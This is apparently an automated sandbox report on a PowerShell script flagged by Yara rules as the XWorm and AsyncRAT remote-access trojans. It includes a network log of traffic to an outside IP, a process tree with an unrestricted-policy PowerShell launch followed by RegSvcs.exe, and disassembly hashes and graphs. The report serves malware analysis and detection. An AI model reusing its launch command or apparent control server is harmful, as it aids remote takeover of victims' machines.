                                Dec 18, 2024 08:17:56.283036947 CET44114970892.255.57.155192.168.2.8
                                Dec 18, 2024 08:17:56.283097982 CET497084411192.168.2.892.255.57.155
                                Dec 18, 2024 08:17:56.335799932 CET44114970892.255.57.155192.168.2.8
                                Dec 18, 2024 08:17:56.402568102 CET44114970892.255.57.155192.168.2.8
                                Dec 18, 2024 08:17:56.404695034 CET497084411192.168.2.892.255.57.155
                                Dec 18, 2024 08:17:56.524228096 CET44114970892.255.57.155192.168.2.8
                                Dec 18, 2024 08:17:56.570069075 CET44114970892.255.57.155192.168.2.8
                                Dec 18, 2024 08:17:56.604705095 CET497084411192.168.2.892.255.57.155
                                Dec 18, 2024 08:17:56.717128038 CET44114970892.255.57.155192.168.2.8
                                Dec 18, 2024 08:17:56.724267006 CET44114970892.255.57.155192.168.2.8
                                Dec 18, 2024 08:17:56.940027952 CET497084411192.168.2.892.255.57.155
                                Dec 18, 2024 08:17:56.950325966 CET497084411192.168.2.892.255.57.155
                                Dec 18, 2024 08:17:57.069953918 CET44114970892.255.57.155192.168.2.8
                                Dec 18, 2024 08:17:57.565541029 CET497084411192.168.2.892.255.57.155
                                Dec 18, 2024 08:17:57.685203075 CET44114970892.255.57.155192.168.2.8
                                Dec 18, 2024 08:17:57.753454924 CET497084411192.168.2.892.255.57.155
                                Dec 18, 2024 08:17:57.873156071 CET44114970892.255.57.155192.168.2.8
                                Dec 18, 2024 08:17:57.998585939 CET44114970892.255.57.155192.168.2.8
                                Dec 18, 2024 08:17:57.999588013 CET497084411192.168.2.892.255.57.155
                                Dec 18, 2024 08:17:58.119353056 CET44114970892.255.57.155192.168.2.8
                                Dec 18, 2024 08:17:58.119420052 CET497084411192.168.2.892.255.57.155
                                Dec 18, 2024 08:17:58.237202883 CET44114970892.255.57.155192.168.2.8
                                Dec 18, 2024 08:17:58.239537954 CET44114970892.255.57.155192.168.2.8
                                Dec 18, 2024 08:17:58.239592075 CET497084411192.168.2.892.255.57.155
                                Dec 18, 2024 08:17:58.359149933 CET44114970892.255.57.155192.168.2.8
                                Dec 18, 2024 08:17:58.429825068 CET44114970892.255.57.155192.168.2.8
                                Dec 18, 2024 08:17:58.509059906 CET497084411192.168.2.892.255.57.155
                                Dec 18, 2024 08:17:58.663863897 CET44114970892.255.57.155192.168.2.8
                                Dec 18, 2024 08:17:58.664835930 CET497084411192.168.2.892.255.57.155
                                Dec 18, 2024 08:17:58.784353971 CET44114970892.255.57.155192.168.2.8
                                Dec 18, 2024 08:17:58.816575050 CET497084411192.168.2.892.255.57.155
                                Dec 18, 2024 08:17:58.936115980 CET44114970892.255.57.155192.168.2.8
                                Dec 18, 2024 08:17:59.116030931 CET497084411192.168.2.892.255.57.155
                                Dec 18, 2024 08:17:59.235657930 CET44114970892.255.57.155192.168.2.8
                                Dec 18, 2024 08:17:59.260083914 CET44114970892.255.57.155192.168.2.8
                                Dec 18, 2024 08:17:59.262856007 CET497084411192.168.2.892.255.57.155
                                Dec 18, 2024 08:17:59.424757004 CET44114970892.255.57.155192.168.2.8
                                Dec 18, 2024 08:17:59.535115004 CET497084411192.168.2.892.255.57.155
                                Dec 18, 2024 08:17:59.549192905 CET44114970892.255.57.155192.168.2.8
                                Dec 18, 2024 08:17:59.620966911 CET497084411192.168.2.892.255.57.155
                                Dec 18, 2024 08:17:59.654690981 CET44114970892.255.57.155192.168.2.8
                                Dec 18, 2024 08:17:59.654758930 CET497084411192.168.2.892.255.57.155
                                Dec 18, 2024 08:17:59.774419069 CET44114970892.255.57.155192.168.2.8
                                Dec 18, 2024 08:17:59.774483919 CET497084411192.168.2.892.255.57.155
                                Dec 18, 2024 08:17:59.894196987 CET44114970892.255.57.155192.168.2.8
                                Dec 18, 2024 08:17:59.894273043 CET497084411192.168.2.892.255.57.155
                                Dec 18, 2024 08:17:59.967978954 CET44114970892.255.57.155192.168.2.8
                                Dec 18, 2024 08:18:00.013843060 CET44114970892.255.57.155192.168.2.8
                                Dec 18, 2024 08:18:00.013906002 CET497084411192.168.2.892.255.57.155
                                Dec 18, 2024 08:18:00.133465052 CET44114970892.255.57.155192.168.2.8
                                Dec 18, 2024 08:18:00.158962965 CET44114970892.255.57.155192.168.2.8
                                Dec 18, 2024 08:18:00.324750900 CET44114970892.255.57.155192.168.2.8
                                Dec 18, 2024 08:18:00.330018997 CET497084411192.168.2.892.255.57.155
                                Dec 18, 2024 08:18:00.350049973 CET44114970892.255.57.155192.168.2.8
                                Dec 18, 2024 08:18:00.515878916 CET44114970892.255.57.155192.168.2.8
                                Dec 18, 2024 08:18:00.516988993 CET497084411192.168.2.892.255.57.155
                                Dec 18, 2024 08:18:05.990967989 CET497084411192.168.2.892.255.57.155
                                Dec 18, 2024 08:18:06.152781010 CET44114970892.255.57.155192.168.2.8
                                Dec 18, 2024 08:18:06.154048920 CET497084411192.168.2.892.255.57.155
                                Dec 18, 2024 08:18:06.273605108 CET44114970892.255.57.155192.168.2.8
                                Dec 18, 2024 08:18:07.624911070 CET497084411192.168.2.892.255.57.155

                                Statistics

                                CPU Usage

                                Click to jump to process

                                Memory Usage

                                Click to jump to process

                                High Level Behavior Distribution

                                Click to dive into process behavior distribution

                                Behavior

                                Click to jump to process

                                System Behavior

                                General

                                Target ID:0
                                Start time:02:15:20
                                Start date:18/12/2024
                                Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                Wow64 process (32bit):false
                                Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\QP2uO3eN2p.ps1"
                                Imagebase:0x7ff6cb6b0000
                                File size:452'608 bytes
                                MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Reputation:high
                                Has exited:true

                                General

                                Target ID:1
                                Start time:02:15:20
                                Start date:18/12/2024
                                Path:C:\Windows\System32\conhost.exe
                                Wow64 process (32bit):false
                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                Imagebase:0x7ff6ee680000
                                File size:862'208 bytes
                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Reputation:high
                                Has exited:true

                                General

                                Target ID:3
                                Start time:02:15:23
                                Start date:18/12/2024
                                Path:C:\Windows\System32\ipconfig.exe
                                Wow64 process (32bit):false
                                Commandline:"C:\Windows\system32\ipconfig.exe" /flushdns
                                Imagebase:0x7ff776840000
                                File size:35'840 bytes
                                MD5 hash:62F170FB07FDBB79CEB7147101406EB8
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Reputation:moderate
                                Has exited:true

                                General

                                Target ID:4
                                Start time:02:15:23
                                Start date:18/12/2024
                                Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                Wow64 process (32bit):true
                                Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
                                Imagebase:0x970000
                                File size:45'984 bytes
                                MD5 hash:9D352BC46709F0CB5EC974633A0C3C94
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Yara matches:
                                • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 00000004.00000002.3156793312.0000000002C91000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: 00000004.00000002.3156793312.0000000002C91000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
                                Reputation:high
                                Has exited:true

                                General

                                Target ID:5
                                Start time:02:15:23
                                Start date:18/12/2024
                                Path:C:\Windows\System32\wermgr.exe
                                Wow64 process (32bit):false
                                Commandline:"C:\Windows\system32\wermgr.exe" "-outproc" "0" "5968" "2404" "2616" "2496" "0" "0" "2348" "0" "0" "0" "0" "0"
                                Imagebase:0x7ff61d450000
                                File size:229'728 bytes
                                MD5 hash:74A0194782E039ACE1F7349544DC1CF4
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Reputation:moderate
                                Has exited:true

                                General

                                Target ID:14
                                Start time:02:17:58
                                Start date:18/12/2024
                                Path:C:\Windows\SysWOW64\WerFault.exe
                                Wow64 process (32bit):true
                                Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 1056 -s 1876
                                Imagebase:0xdb0000
                                File size:483'680 bytes
                                MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Reputation:high
                                Has exited:true

                                Disassembly

                                Reset < >

                                  Executed Functions

                                  Function 00007FFB4B06E42A Relevance: .2, Instructions: 223COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1698510269.00007FFB4B060000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B060000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_7ffb4b060000_powershell.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 9343235437f5b05bfb1ed79c23c98cc5cab9bb8260a34a61582e113805a0ba30
                                  • Instruction ID: 0e5641f5a97ee6e1ca898bc42ece0575d051063a7f52967143ae173490fb9857
                                  • Opcode Fuzzy Hash: 9343235437f5b05bfb1ed79c23c98cc5cab9bb8260a34a61582e113805a0ba30
                                  • Instruction Fuzzy Hash: 457134B1D0C60A8FE728AF3CC9411ED77E1EB98301F00467ED54AD73A6EE3859458B80
                                  Function 00007FFB4B13149A Relevance: .1, Instructions: 107COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1698976422.00007FFB4B130000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B130000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_7ffb4b130000_powershell.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 2e29ab404c7148dcb54eec93a6e37a86cd7d0ec0220ce412cff220d71b32ca92
                                  • Instruction ID: 571858506f57f356304ce74fe97288725822942cdb9045a78a1066ae3685c4a9
                                  • Opcode Fuzzy Hash: 2e29ab404c7148dcb54eec93a6e37a86cd7d0ec0220ce412cff220d71b32ca92
                                  • Instruction Fuzzy Hash: 55215A73B1C9294FFBA1AA7CE4162F8B3C1EF89220B0851B7D54EC31A2ED18D82547C0
                                  Function 00007FFB4B06584A Relevance: .1, Instructions: 62COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1698510269.00007FFB4B060000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B060000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_7ffb4b060000_powershell.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 969a1a37aa2a3d33d3682c42f600bb754074c05399b6e97b293fba8151797ed2
                                  • Instruction ID: 766ec933803b8bd467d45371256d16e3838756291bd61d2bae05db72919ec07d
                                  • Opcode Fuzzy Hash: 969a1a37aa2a3d33d3682c42f600bb754074c05399b6e97b293fba8151797ed2
                                  • Instruction Fuzzy Hash: 091127A192CB895FE34CEB3CC49A4787BE1EF55241F0095BED189C72A2DD28D4028752
                                  Function 00007FFB4B0658B9 Relevance: .1, Instructions: 60COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1698510269.00007FFB4B060000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B060000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_7ffb4b060000_powershell.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: a5f925afc12ec114d599dfd5cc0fade4a3fd2573b2b3cf9ccc3ddb20610aa80d
                                  • Instruction ID: 8cd28f90b10ee8469e9537e99382e76ae790926ebc091f278f0002e7587aed94
                                  • Opcode Fuzzy Hash: a5f925afc12ec114d599dfd5cc0fade4a3fd2573b2b3cf9ccc3ddb20610aa80d
                                  • Instruction Fuzzy Hash: 6A1106A1A2CB891FE34CFB3CC05657C76D2EF99240B0094BEE089C32A3DD2898028752
                                  Function 00007FFB4B06E000 Relevance: .1, Instructions: 55COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1698510269.00007FFB4B060000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B060000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_7ffb4b060000_powershell.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: eaad2afb703781fe5ef9a7f09fb04cf957a83bcab7be99416e6cb2a55abe9021
                                  • Instruction ID: 21f7fceaf4b88212827b7616b99d2cb88af37e6935582fe575932506796110a5
                                  • Opcode Fuzzy Hash: eaad2afb703781fe5ef9a7f09fb04cf957a83bcab7be99416e6cb2a55abe9021
                                  • Instruction Fuzzy Hash: F8012970A1CA494FE694FF3CC5592BAB2D1EF98302F50497EE94AC33B1DE6968818740
                                  Function 00007FFB4B0637B5 Relevance: .0, Instructions: 49COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1698510269.00007FFB4B060000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B060000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_7ffb4b060000_powershell.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 582908582f657131c1f04ed76f34d09c60f6b2c2f8b724a61ceffa3ac25bcdd6
                                  • Instruction ID: 3ba2237e2420ca9a756c9589bd96a5d5cc010e243e56cc03807f5998e0cadb4a
                                  • Opcode Fuzzy Hash: 582908582f657131c1f04ed76f34d09c60f6b2c2f8b724a61ceffa3ac25bcdd6
                                  • Instruction Fuzzy Hash: DE01A77010CB0C8FDB48EF0CE051AA6B3E0FB85320F10056DE58AC3661D632E882CB45
                                  Function 00007FFB4B1314C1 Relevance: .0, Instructions: 41COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1698976422.00007FFB4B130000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B130000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_7ffb4b130000_powershell.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 5a969aeae94d6532d112372b3ed32bec73e9647ced74a9a037dd76a3c8eed7be
                                  • Instruction ID: 40e31298ec6a851a1bd5e96563e4e123d08b8f34aea85f504ebe8bc8b41a0187
                                  • Opcode Fuzzy Hash: 5a969aeae94d6532d112372b3ed32bec73e9647ced74a9a037dd76a3c8eed7be
                                  • Instruction Fuzzy Hash: 73F027A3F2D9290EF7E5AAAC741B1F856C1DF9A52074852B7D94EC3252FC189C3603C0
                                  Function 00007FFB4B064CD1 Relevance: .0, Instructions: 25COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1698510269.00007FFB4B060000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B060000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_7ffb4b060000_powershell.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 3c2665f9dc6837db9ccf4dddd278245b0af311693f6dd907fbbb64c8da830607
                                  • Instruction ID: 7472c66fde53e3c47eec6fbea32e51088af6c021e39e817fe0e6397bfadc6a57
                                  • Opcode Fuzzy Hash: 3c2665f9dc6837db9ccf4dddd278245b0af311693f6dd907fbbb64c8da830607
                                  • Instruction Fuzzy Hash: 80F0DA75D1820B8FDB40EFA8C5815EEB7F0EF45311F148969D115EB354D638A6408B94
                                  Function 00007FFB4B068AAE Relevance: .0, Instructions: 13COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1698510269.00007FFB4B060000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B060000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_7ffb4b060000_powershell.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 34f819592b754329755a513f0172eab2dd6b9e8eb58747ef82e6f3568c6342f5
                                  • Instruction ID: e3800eb965f5b8179e6c190c988bb25574308181b473a339eab4501ef5b244cf
                                  • Opcode Fuzzy Hash: 34f819592b754329755a513f0172eab2dd6b9e8eb58747ef82e6f3568c6342f5
                                  • Instruction Fuzzy Hash: 89D02270D1C3809FEB2C3AB88A030763315EB06A05720B0BFC28783173DC3880838A80

                                  Execution Graph

                                  Execution Coverage:15.6%
                                  Dynamic/Decrypted Code Coverage:100%
                                  Signature Coverage:30.2%
                                  Total number of Nodes:43
                                  Total number of Limit Nodes:10
                                  execution_graph 19154 2bf7760 19156 2bf7766 19154->19156 19155 2bf7811 19156->19155 19159 2bf7a18 19156->19159 19164 2bf7b81 19156->19164 19161 2bf7a52 19159->19161 19160 2bf7c1e 19160->19156 19161->19160 19169 2bf813b 19161->19169 19173 2bf8140 19161->19173 19165 2bf7b3a 19164->19165 19166 2bf7c1e 19165->19166 19167 2bf813b 3 API calls 19165->19167 19168 2bf8140 3 API calls 19165->19168 19166->19156 19167->19165 19168->19165 19170 2bf8166 19169->19170 19171 2bf83b5 19170->19171 19177 2bf91b0 19170->19177 19171->19171 19174 2bf8166 19173->19174 19175 2bf83b5 19174->19175 19176 2bf91b0 3 API calls 19174->19176 19176->19174 19180 2bfe8a8 19177->19180 19178 2bf91b6 19181 2bfe8c1 19180->19181 19182 2bfeaed 19181->19182 19184 2bfee52 19181->19184 19182->19178 19188 2bfee8a 19184->19188 19197 2bfee98 19184->19197 19185 2bfee6e 19185->19181 19189 2bfee98 19188->19189 19190 2bfeea5 19189->19190 19205 2bfe5f8 19189->19205 19190->19185 19192 2bfeeee 19192->19185 19194 2bfef53 19194->19185 19195 2bfefb6 GlobalMemoryStatusEx 19196 2bfefe6 19195->19196 19196->19185 19198 2bfeecd 19197->19198 19199 2bfeea5 19197->19199 19200 2bfe5f8 GlobalMemoryStatusEx 19198->19200 19199->19185 19202 2bfeeea 19200->19202 19201 2bfeeee 19201->19185 19202->19201 19203 2bfefb6 GlobalMemoryStatusEx 19202->19203 19204 2bfefe6 19203->19204 19204->19185 19206 2bfef70 GlobalMemoryStatusEx 19205->19206 19208 2bfeeea 19206->19208 19208->19192 19208->19194 19208->19195

                                  Executed Functions

                                  Function 05607534 Relevance: 3.5, Strings: 2, Instructions: 1021COMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 0 5607534-560796a 178 560796d call 5609480 0->178 179 560796d call 5609472 0->179 2 5607973-560799c 5 56079a1-56079b6 2->5 6 5607e28-5607e53 5->6 7 56079bc 5->7 12 5608104-5608125 6->12 13 5607e59-5607e6f 6->13 8 5607d14-5607d35 7->8 16 5607d37-5607d4b 8->16 17 5607d4d-5607d57 8->17 23 5608127-560813b 12->23 24 560813d-5608147 12->24 20 5607e76 13->20 19 5607d61-5607d67 16->19 17->19 19->5 22 5607e7b-5607e8a 20->22 25 5607edc-5607f08 22->25 26 5607e8c 22->26 27 5608151 23->27 24->27 36 5609247-5609281 25->36 37 5607f0e-5607f4f 25->37 26->20 26->25 28 5607e93-5607ea8 26->28 29 5607eaa-5607ebf 26->29 30 5608293-56082be 27->30 28->22 29->22 41 5608381-56083ac 30->41 42 56082c4-560833f 30->42 60 5609286-560928d 36->60 37->30 49 5607f55 37->49 52 5608428-5608453 41->52 53 56083ae-56083ba 41->53 42->36 66 5608345-5608348 42->66 49->8 49->12 49->20 49->25 49->28 49->29 63 5608459-56084bf 52->63 64 560851b-5608546 52->64 53->60 84 56084ca-56084ee 63->84 74 5608548-5608554 64->74 75 56085a9-56085ca 64->75 70 5608354-5608378 66->70 70->41 72 560837a 70->72 72->41 72->70 74->60 81 56085e2-56085ec 75->81 82 56085cc-56085e0 75->82 83 56085f6-56085fc 81->83 82->83 85 5608587-560859c 83->85 84->64 86 56084f0 84->86 93 56087b0-56087db 85->93 98 56085a2 85->98 86->64 86->75 86->84 87 5608741-5608785 86->87 88 5608582 86->88 89 5608822 86->89 90 5608849-56088e5 86->90 91 560878a-56087ab 86->91 92 560866b-56086b8 86->92 86->93 94 56084f7-5608501 86->94 95 56086bd-56086de 86->95 96 56086fd-560873c 86->96 97 56085fe-5608666 86->97 87->60 88->85 100 5608827-560883c 89->100 90->100 91->85 92->85 118 56087e1-56087eb 93->118 119 5608bf2-5608c13 93->119 94->36 99 5608507-5608516 94->99 120 56086e0-56086eb 95->120 121 56086ed-56086f2 95->121 96->60 97->85 98->75 98->87 98->88 98->89 98->90 98->91 98->92 98->93 98->95 98->96 98->97 99->60 100->60 105 5608842 100->105 105->89 105->90 123 56087f1-56087fe 118->123 124 56088ea-5608906 118->124 144 5608c22-5608c27 119->144 145 5608c15-5608c20 119->145 125 56086f8 120->125 121->125 123->124 130 5608804-560881c 123->130 147 5608909 124->147 125->85 130->89 146 5608c2d 144->146 145->146 152 5608cfc-5608d07 146->152 150 5608913-5608927 147->150 153 5608a59-5608a5e 150->153 154 560892d 150->154 153->60 154->147 154->152 154->153 155 5608a13-5608a39 154->155 156 5608934-560895b 154->156 157 56089e7-5608a0e 154->157 158 560898d-56089e2 154->158 159 560895d-560898b 154->159 160 5608a3e-5608a54 154->160 155->150 156->150 157->150 158->150 159->150 160->150 178->2 179->2
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000004.00000002.3163684374.0000000005600000.00000040.00000800.00020000.00000000.sdmp, Offset: 05600000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_4_2_5600000_RegSvcs.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: ykk.$%a
                                  • API String ID: 0-2664548475
                                  • Opcode ID: 4ce50f01cd91f21d43f30bd9b7f446db347a1d72ab6da776b971cbf5d6706e6e
                                  • Instruction ID: 466b67d4ec90a2bedfe18c766e98f7391fef54aa275f33a4f7d8f3cabd491d49
                                  • Opcode Fuzzy Hash: 4ce50f01cd91f21d43f30bd9b7f446db347a1d72ab6da776b971cbf5d6706e6e
                                  • Instruction Fuzzy Hash: 99326D74A05215CFEB68EF24D994BAAB773BB89300F1080E9D50AAB395DF319D81CF51
                                  Function 02BFBF08 Relevance: 1.5, Strings: 1, Instructions: 281COMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 315 2bfbf08-2bfbf6e 317 2bfbfb8-2bfbfba 315->317 318 2bfbf70-2bfbf7b 315->318 320 2bfbfbc-2bfbfd5 317->320 318->317 319 2bfbf7d-2bfbf89 318->319 321 2bfbfac-2bfbfb6 319->321 322 2bfbf8b-2bfbf95 319->322 327 2bfbfd7-2bfbfe3 320->327 328 2bfc021-2bfc023 320->328 321->320 323 2bfbf99-2bfbfa8 322->323 324 2bfbf97 322->324 323->323 326 2bfbfaa 323->326 324->323 326->321 327->328 330 2bfbfe5-2bfbff1 327->330 329 2bfc025-2bfc07d 328->329 339 2bfc07f-2bfc08a 329->339 340 2bfc0c7-2bfc0c9 329->340 331 2bfc014-2bfc01f 330->331 332 2bfbff3-2bfbffd 330->332 331->329 334 2bfbfff 332->334 335 2bfc001-2bfc010 332->335 334->335 335->335 336 2bfc012 335->336 336->331 339->340 341 2bfc08c-2bfc098 339->341 342 2bfc0cb-2bfc0e3 340->342 343 2bfc0bb-2bfc0c5 341->343 344 2bfc09a-2bfc0a4 341->344 348 2bfc12d-2bfc12f 342->348 349 2bfc0e5-2bfc0f0 342->349 343->342 346 2bfc0a8-2bfc0b7 344->346 347 2bfc0a6 344->347 346->346 350 2bfc0b9 346->350 347->346 352 2bfc131-2bfc196 348->352 349->348 351 2bfc0f2-2bfc0fe 349->351 350->343 353 2bfc121-2bfc12b 351->353 354 2bfc100-2bfc10a 351->354 361 2bfc19f-2bfc1bf 352->361 362 2bfc198-2bfc19e 352->362 353->352 355 2bfc10e-2bfc11d 354->355 356 2bfc10c 354->356 355->355 358 2bfc11f 355->358 356->355 358->353 366 2bfc1c9-2bfc1ff 361->366 362->361 369 2bfc20f-2bfc213 366->369 370 2bfc201-2bfc205 366->370 371 2bfc215-2bfc219 369->371 372 2bfc223-2bfc227 369->372 370->369 373 2bfc207 370->373 371->372 374 2bfc21b 371->374 375 2bfc229-2bfc22d 372->375 376 2bfc237-2bfc23b 372->376 373->369 374->372 375->376 377 2bfc22f-2bfc232 call 2bf7f3c 375->377 378 2bfc23d-2bfc241 376->378 379 2bfc24b-2bfc24f 376->379 377->376 378->379 381 2bfc243-2bfc246 call 2bf7f3c 378->381 382 2bfc25f-2bfc263 379->382 383 2bfc251-2bfc255 379->383 381->379 384 2bfc265-2bfc269 382->384 385 2bfc273-2bfc277 382->385 383->382 387 2bfc257-2bfc25a call 2bf7f3c 383->387 384->385 388 2bfc26b 384->388 389 2bfc279-2bfc27d 385->389 390 2bfc287 385->390 387->382 388->385 389->390 392 2bfc27f 389->392 393 2bfc288 390->393 392->390 393->393
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000004.00000002.3155921895.0000000002BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02BF0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_4_2_2bf0000_RegSvcs.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: \VNn
                                  • API String ID: 0-207492048
                                  • Opcode ID: b064e8860f7ee304aee942bb2e3267206dbfe48b374f7c709fc7f5c2eec1b92f
                                  • Instruction ID: 480f0d3ac295f5b4fdd5fba77fe30ac08b6db38cca6476f568f57a2a1f0cc51d
                                  • Opcode Fuzzy Hash: b064e8860f7ee304aee942bb2e3267206dbfe48b374f7c709fc7f5c2eec1b92f
                                  • Instruction Fuzzy Hash: 7CB16C70E0020D8FDB54DFA9C8857DEBBF2EF88704F14816AD915A7294EB759889CF81
                                  Function 05602DE8 Relevance: .5, Instructions: 513COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000004.00000002.3163684374.0000000005600000.00000040.00000800.00020000.00000000.sdmp, Offset: 05600000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_4_2_5600000_RegSvcs.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 68e847b605432b5d2126e6cb527f0b6447badaa4c852bd021debc44210a381af
                                  • Instruction ID: 3fc4b5e4b68e9e067a45b415e7efa94c760b1353af1d0ebb144038f0cae9fdc3
                                  • Opcode Fuzzy Hash: 68e847b605432b5d2126e6cb527f0b6447badaa4c852bd021debc44210a381af
                                  • Instruction Fuzzy Hash: CF126B70B002199FDB18DF69C854BAEBBB6FF88705F108569E416EB391DB319D42CB90
                                  Function 05603410 Relevance: .4, Instructions: 440COMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 985 5603410-5603446 1109 5603448 call 5603410 985->1109 1110 5603448 call 5602de8 985->1110 986 560344e-5603454 987 56034a4-56034a8 986->987 988 5603456-560345a 986->988 991 56034aa-56034b9 987->991 992 56034bf-56034d3 987->992 989 5603469-5603470 988->989 990 560345c-5603461 988->990 993 5603546-5603583 989->993 994 5603476-560347d 989->994 990->989 995 56034e5-56034ef 991->995 996 56034bb-56034bd 991->996 997 56034db-56034e2 992->997 1006 5603585-560358b 993->1006 1007 560358e-56035ae 993->1007 994->987 1000 560347f-5603483 994->1000 998 56034f1-56034f7 995->998 999 56034f9-56034fd 995->999 996->997 1002 5603505-560353f 998->1002 999->1002 1003 56034ff 999->1003 1004 5603492-5603499 1000->1004 1005 5603485-560348a 1000->1005 1002->993 1003->1002 1004->993 1008 560349f-56034a2 1004->1008 1005->1004 1006->1007 1013 56035b0 1007->1013 1014 56035b5-56035bc 1007->1014 1008->997 1016 5603944-560394d 1013->1016 1017 56035be-56035c9 1014->1017 1018 5603955-5603963 1017->1018 1019 56035cf-56035e2 1017->1019 1024 56035e4-56035f2 1019->1024 1025 56035f8-5603613 1019->1025 1024->1025 1028 56038cc-56038d3 1024->1028 1029 5603615-560361b 1025->1029 1030 5603637-560363a 1025->1030 1028->1016 1033 56038d5-56038d7 1028->1033 1031 5603624-5603627 1029->1031 1032 560361d 1029->1032 1034 5603640-5603643 1030->1034 1035 5603794-560379a 1030->1035 1037 560365a-5603660 1031->1037 1038 5603629-560362c 1031->1038 1032->1031 1032->1035 1036 5603886-5603889 1032->1036 1032->1037 1039 56038e6-56038ec 1033->1039 1040 56038d9-56038de 1033->1040 1034->1035 1042 5603649-560364f 1034->1042 1035->1036 1041 56037a0-56037a5 1035->1041 1044 5603950 1036->1044 1045 560388f-5603895 1036->1045 1046 5603662-5603664 1037->1046 1047 5603666-5603668 1037->1047 1048 5603632 1038->1048 1049 56036c6-56036cc 1038->1049 1039->1018 1050 56038ee-56038f3 1039->1050 1040->1039 1041->1036 1042->1035 1043 5603655 1042->1043 1043->1036 1044->1018 1052 5603897-560389f 1045->1052 1053 56038ba-56038be 1045->1053 1054 5603672-560367b 1046->1054 1047->1054 1048->1036 1049->1036 